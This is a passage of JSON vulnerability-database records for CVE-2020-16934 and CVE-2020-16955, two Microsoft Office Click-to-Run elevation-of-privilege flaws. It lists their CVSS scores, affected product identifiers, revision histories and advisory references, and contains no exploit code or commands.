"cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16934"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-04-23T01:09:38", "references": [{"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["MS:CVE-2020-16934"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-04-23T01:09:38", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"}], "hash": "f05fec31ef7926bdf8bdfbb480ad00fd64a0f7cbb993493e91aa4d32182188cc", "hashmap": [{"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "9f07fc79fd96425ffe7af9f348a376d3", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d97cd98427033ef99d7ece96cd433440", "key": "cpe"}, {"hash": "846a8db81f4c64695be131b7890928a8", "key": "cpeConfiguration"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "68c7e2fafc3e11d5a55b53907c05df7c", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "4aad597ac1204ece85ab0aa87e8e57f5", "key": "title"}, {"hash": "9311cbfce72873cbbe0c76b1985ec72d", "key": "modified"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "d1fd53bc3ff75ff44289931ee5637b03", "key": "extraReferences"}, {"hash": "83df37a1cf6c77dcffef92e4bca4fa70", "key": "description"}, {"hash": "33505c5e409237f20ec80bdac8f93985", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6f84ced2d5775a1d2a7bf11629ea533d", "key": "references"}, {"hash": "d314ac9e84ae7d46ffaec0919bb91aed", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "id": "CVE-2020-16934", "immutableFields": [], "lastseen": "2021-04-23T01:09:38", "modified": "2020-10-21T16:55:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16934", "type": "cve", "viewCount": 16}, "different_elements": ["modified"], "edition": 4, "lastseen": "2021-04-23T01:09:38"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-16934"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-17T11:07:32", "references": [{"idList": ["MS:CVE-2020-16934"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-17T11:07:32", "rev": 2, "value": 3.5, "vector": "NONE"}}, "hash": "3dabaaf9270c6f198d1611c1d1969920a0ae3124d3bc5fc7b39352e3ee973c54", "hashmap": [{"hash": "e1830bc9646a937aba1cb2a528f5f03d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "68c7e2fafc3e11d5a55b53907c05df7c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "4aad597ac1204ece85ab0aa87e8e57f5", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "83df37a1cf6c77dcffef92e4bca4fa70", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "6f84ced2d5775a1d2a7bf11629ea533d", "key": "references"}, {"hash": "d314ac9e84ae7d46ffaec0919bb91aed", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "id": "CVE-2020-16934", "lastseen": "2020-10-17T11:07:32", "modified": "2020-10-17T00:24:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "reporter": "cve@mitre.org", "title": "CVE-2020-16934", "type": "cve", "viewCount": 1}, "differentElements": ["cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2020-10-17T11:07:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office_2013_click-to-run", "name": "microsoft office 2013 click-to-run", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:office_2013_click-to-run:-", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16934"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-02-02T07:37:01", "references": [{"idList": ["MS:CVE-2020-16934"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-02-02T07:37:01", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"}], "hash": "b433d6aa64e310a82d45ae2ad2c56175486faf32813134bb04b0a0592b59e455", "hashmap": [{"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "9f07fc79fd96425ffe7af9f348a376d3", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d97cd98427033ef99d7ece96cd433440", "key": "cpe"}, {"hash": "b3d13bcc0e8d04c4da35f397d6e18278", "key": "cpeConfiguration"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "68c7e2fafc3e11d5a55b53907c05df7c", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "4aad597ac1204ece85ab0aa87e8e57f5", "key": "title"}, {"hash": "9311cbfce72873cbbe0c76b1985ec72d", "key": "modified"}, {"hash": "d1fd53bc3ff75ff44289931ee5637b03", "key": "extraReferences"}, {"hash": "83df37a1cf6c77dcffef92e4bca4fa70", "key": "description"}, {"hash": "33505c5e409237f20ec80bdac8f93985", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6f84ced2d5775a1d2a7bf11629ea533d", "key": "references"}, {"hash": "d314ac9e84ae7d46ffaec0919bb91aed", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "id": "CVE-2020-16934", "immutableFields": [], "lastseen": "2021-02-02T07:37:01", "modified": "2020-10-21T16:55:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "reporter": "cve@mitre.org", "title": "CVE-2020-16934", "type": "cve", "viewCount": 13}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 3, "lastseen": "2021-02-02T07:37:01"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office_2013_click-to-run", "name": "microsoft office 2013 click-to-run", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:office_2013_click-to-run:-", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16934"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-10-22T10:49:04", "references": [{"idList": ["MS:CVE-2020-16934"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-22T10:49:04", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [], "hash": "dd11b9508bad49f692d0e695cf7e58cf82885760dd4d4bac4e7f8fc7929f3f9f", "hashmap": [{"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "9f07fc79fd96425ffe7af9f348a376d3", "key": "affectedSoftware"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d97cd98427033ef99d7ece96cd433440", "key": "cpe"}, {"hash": "b3d13bcc0e8d04c4da35f397d6e18278", "key": "cpeConfiguration"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "68c7e2fafc3e11d5a55b53907c05df7c", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "4aad597ac1204ece85ab0aa87e8e57f5", "key": "title"}, {"hash": "9311cbfce72873cbbe0c76b1985ec72d", "key": "modified"}, {"hash": "83df37a1cf6c77dcffef92e4bca4fa70", "key": "description"}, {"hash": "33505c5e409237f20ec80bdac8f93985", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6f84ced2d5775a1d2a7bf11629ea533d", "key": "references"}, {"hash": "d314ac9e84ae7d46ffaec0919bb91aed", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "id": "CVE-2020-16934", "lastseen": "2020-10-22T10:49:04", "modified": "2020-10-21T16:55:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "reporter": "cve@mitre.org", "title": "CVE-2020-16934", "type": "cve", "viewCount": 12}, "differentElements": ["extraReferences"], "edition": 2, "lastseen": "2020-10-22T10:49:04"}], "edition": 6, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "9f07fc79fd96425ffe7af9f348a376d3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d97cd98427033ef99d7ece96cd433440"}, {"key": "cpe23", "hash": "33505c5e409237f20ec80bdac8f93985"}, {"key": "cpeConfiguration", "hash": "846a8db81f4c64695be131b7890928a8"}, {"key": "cvelist", "hash": "68c7e2fafc3e11d5a55b53907c05df7c"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "1384068fbd8bc4f34a3a4a821a5848fe"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "83df37a1cf6c77dcffef92e4bca4fa70"}, {"key": "extraReferences", "hash": "d1fd53bc3ff75ff44289931ee5637b03"}, {"key": "href", "hash": "d314ac9e84ae7d46ffaec0919bb91aed"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "183798fce373747341ba2f32f8021ac7"}, {"key": "published", "hash": "ccdbc538dd5b4d39f6035c206ec1fa15"}, {"key": "references", "hash": "6f84ced2d5775a1d2a7bf11629ea533d"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "4aad597ac1204ece85ab0aa87e8e57f5"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "7eea9f1624fa3385113a59e37944bfd46e86fa9e25d75b8c30bd8cdabe3b6bd6", "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16934"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-08-04T16:55:08", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-08-04T16:55:08", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:microsoft:office_2013_click-to-run:-", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2019"], "affectedSoftware": [{"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office_2013_click-to-run", "name": "microsoft office 2013 click-to-run", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"}], "immutableFields": []}, {"id": "CVE-2020-16955", "bulletinFamily": "NVD", "title": "CVE-2020-16955", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "published": "2020-10-16T23:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "cvelist": ["CVE-2020-16955"], "type": "cve", "lastseen": "2021-08-04T16:55:08", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16955"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-04-23T01:09:38", "references": [{"idList": ["MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-04-23T01:09:38", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"}], "hash": "353f6c142af1669b52ab9ed29d1cdb0136b314b72f3934da6f7dbebcf3e288aa", "hashmap": [{"hash": "4a3aee4b54ce8b516813fbaf41c91f10", "key": "extraReferences"}, {"hash": "b4ccfad4424f2d7338159c9c26949e7b", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "853c5b524289598f560137e4983f02e8", "key": "href"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "9a5f42b84e7cc06c4b7729d45f289f08", "key": "title"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "5b4efb4a89011606ec7433597805d502", "key": "modified"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "cfe79bfa013d4a3b73a902e04505ab33", "key": "cpeConfiguration"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "15ffbc73449707a93845f54ba911bac0", "key": "cvelist"}, {"hash": "0a70a7011cff227bded54858f06ad826", "key": "references"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "id": "CVE-2020-16955", "immutableFields": [], "lastseen": "2021-04-23T01:09:38", "modified": "2020-10-21T20:06:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16955", "type": "cve", "viewCount": 48}, "different_elements": ["modified"], "edition": 5, "lastseen": "2021-04-23T01:09:38"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], 